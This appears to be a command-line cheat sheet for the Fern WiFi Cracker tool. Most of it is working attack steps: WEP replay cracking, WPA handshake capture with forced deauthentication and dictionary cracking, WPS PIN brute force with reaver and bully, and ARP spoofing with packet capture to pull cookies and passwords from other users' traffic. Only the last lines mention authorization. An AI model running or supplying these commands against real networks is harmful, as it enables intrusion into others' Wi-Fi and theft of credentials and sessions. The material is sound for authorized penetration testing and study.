sudo apt-get update
sudo apt-get install fern-wifi-cracker
git clone https://github.com/savio-code/fern-wifi-cracker
cd fern-wifi-cracker
sudo python setup.py install
sudo apt-get install aircrack-ng reaver bully python-gtk2 python-paramiko
fern-wifi-cracker --version
# Run as root (required for packet capture)
sudo fern-wifi-cracker
fern-wifi-cracker --help
| Step | Action | Description |
|---|
| 1 | Select interface | Choose wireless adapter (wlan0, wlan1, etc.) |
| 2 | Monitor mode | Enable monitor mode on selected interface |
| 3 | Channel selection | Leave as auto or specify channel range |
| 4 | Confirm | Click Start to begin scanning |
sudo airmon-ng start wlan0
# Creates mon0 interface
sudo airmon-ng stop mon0
sudo service network-manager restart
- Click Scan in main window
- Networks appear in list with signal strength
- Refresh rate updates every few seconds
- BSSID, SSID, encryption type, and channel displayed
| Column | Meaning |
|---|
| SSID | Network name |
| BSSID | MAC address of access point |
| Channel | WiFi channel (1-14) |
| Security | WEP, WPA, WPA2, Open |
| Signal | Strength in dBm |
| Clients | Connected devices |
# Scan specific channel only
# Configure in Fern UI: Preferences > Advanced
- Select WEP network from scan list
- Click WEP in attack menu
- Choose attack method:
- Standard - Aircrack-ng default
- Chopchop - Fast method, 60% success
- Fragmentation - Works with low traffic
# Automatic in Fern, or manual:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture mon0
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 mon0
- Minimum 40,000 IV packets required
- Wait for sufficient IVs collected
- Fern automatically cracks when ready
- Key displayed in hex format (e.g.,
1a2b3c4d5e)
# Use rockyou.txt or generate custom list
gunzip /usr/share/wordlists/rockyou.txt.gz
# Or create custom list
echo "password123" > wordlist.txt
echo "admin" >> wordlist.txt
- Select WPA/WPA2 network
- Click WPA in attack menu
- Verify BSSID and SSID match
- Select wordlist:
- Load rockyou.txt
- Or point to custom list
- Click Start Attack
# Capture 4-way handshake (automatic in Fern)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake mon0
# Force deauth to speed up handshake
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF mon0
sudo aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
| Feature | Details |
|---|
| Speed | 2-10 hours typical |
| Success Rate | 90%+ with default PIN |
| Target | WPS-enabled routers |
| Output | 8-digit PIN, then WiFi password |
- Select WPS-enabled network
- Click WPS > Reaver
- Review target BSSID
- Click Start
- Wait for PIN discovery
sudo reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv
sudo reaver -i mon0 -b AA:BB:CC:DD:EE:FF \
--timeout=10 \
--max-attempts=0 \
--delay=0 \
-vv
sudo bully -i mon0 -b AA:BB:CC:DD:EE:FF -v 1
| Option | Purpose |
|---|
-i | Interface (monitor mode) |
-b | BSSID of target |
-v | Verbosity level |
--timeout | Seconds to wait per attempt |
--max-attempts | Maximum PIN tries (0=unlimited) |
- Select target client in Fern
- Click Session Hijacking
- Choose attack type:
- ARP Spoofing
- TCP/UDP injection
- HTTPS stripping
sudo arpspoof -i wlan0 -t TARGET_IP GATEWAY_IP
# Simultaneously run tcpdump to capture traffic
sudo tcpdump -i wlan0 -w capture.pcap
- Select connected client
- Specify target gateway
- Enable packet sniffing
- Monitor captured credentials
- Enable session hijacking
- Filter for HTTP/HTTPS traffic
- Monitor for session cookies
- Extract cookie values
# Use Wireshark to inspect captured packets
wireshark capture.pcap
# Filter: http.cookie
- Automatic in Session Hijacking mode
- Displays captured cookies
- Shows HTTP authentication data
- Identifies unencrypted sessions
- Tools > GeoIP Database
- Download MaxMind GeoLite2 database
- Point Fern to database location
- Scan results show location markers
- Right-click BSSID > GeoIP
- Displays country, city, coordinates
- Useful for site surveys
# Database location
~/.fern/geoip/GeoLite2-City.mmdb
# Download latest
wget https://geoip.maxmind.com/geoip/databases/GeoLite2-City/download?suffix=tar.gz
/usr/share/wordlists/rockyou.txt # 14M passwords
/usr/share/wordlists/fasttrack.txt # Common passwords
/usr/share/wordlists/darkweb2017-top10000.txt
- Click Tools > Wordlist Manager
- Add custom lists
- View list statistics
- Enable/disable lists for attacks
# Create from common patterns
crunch 8 8 0123456789 > numeric8.txt
# Merge multiple lists
cat list1.txt list2.txt > combined.txt
# Remove duplicates
sort -u wordlist.txt > wordlist-clean.txt
# Count entries
wc -l wordlist.txt
# Combine base words with rule mutations
hashcat -r /usr/share/hashcat/rules/best64.rule wordlist.txt
- Tools > Database of Cracked Networks
- Search by SSID or BSSID
- View password and timestamp
- Export results
~/.fern/database/networks.db
- Select networks from database
- Click Export
- Choose format (CSV, TXT)
- Save to file
cp ~/.fern/database/networks.db networks.db.bak
- Click Tools > Database
- Select Import
- Choose backup file
- Merge with current database
- Interface - Select wireless adapter
- Channel Range - 1-11 (US), 1-13 (EU), 1-14 (Japan)
- Scan Rate - Refresh interval in seconds
- Timeout - Handshake capture wait time
- WPA Timeout - Seconds per password attempt
- Reaver Timeout - Delay between PIN guesses
- Max Attempts - Cap on cracking attempts
- Verbosity - Debug output level
- Theme - Light/Dark mode
- Font Size - Adjust readability
- Refresh Rate - Update frequency
- Window Size - Save position/size
# 1. Enable monitor mode
sudo airmon-ng start wlan0
# 2. Launch Fern
sudo fern-wifi-cracker
# 3. Scan networks
# 4. Select WPA target
# 5. Load /usr/share/wordlists/rockyou.txt
# 6. Click Start Attack
# 7. Wait for password discovery
# 1. Identify WPS network in scan
# 2. Right-click > WPS > Reaver
# 3. Monitor progress in output window
# 4. PIN typically found in 2-10 hours
# 5. Password automatically extracted
# 1. Scan and select target network
# 2. View **Clients** tab
# 3. See connected device MAC addresses
# 4. Right-click client > **Info**
# 5. View signal strength and device details
# 1. Enable Session Hijacking
# 2. Select target client
# 3. Specify gateway IP
# 4. Click Start
# 5. Monitor HTTP requests in output
# 6. Extract username/password from traffic
# Check interface
sudo iwconfig
# Force restart
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Verify with airmon-ng
sudo airmon-ng
- Verify wireless adapter supports monitor mode
- Check USB adapter power supply
- Ensure interface is mon0 or mon1
- Try manual scan:
sudo airodump-ng mon0
- Increase capture time (wait 2-3 minutes)
- Get closer to target AP
- Force deauth to nearby client
- Verify encryption is actually WPA/WPA2
- Use smaller wordlist (fasttrack.txt)
- Verify handshake is valid (use Wireshark)
- Try GPU acceleration with hashcat
- Increase timeout setting
- Verify WPS is enabled on router
- Check router isn’t rate-limiting
- Try Bully instead of Reaver
- Update Reaver/Bully to latest version
| Practice | Benefit |
|---|
| Obtain written authorization | Legal compliance |
| Test on lab networks first | Avoid mistakes on targets |
| Use strong wordlists | Better success rate |
| Monitor signal strength | Improve handshake capture |
| Keep tools updated | Latest exploits and fixes |
| Document findings | Professional reporting |
- Only use on networks you own or have permission to test
- WPA2 with strong passwords resists dictionary attacks
- Modern routers implement WPS rate limiting
- EAP/Enterprise WPA2 requires different tools
- Always obtain written authorization before testing
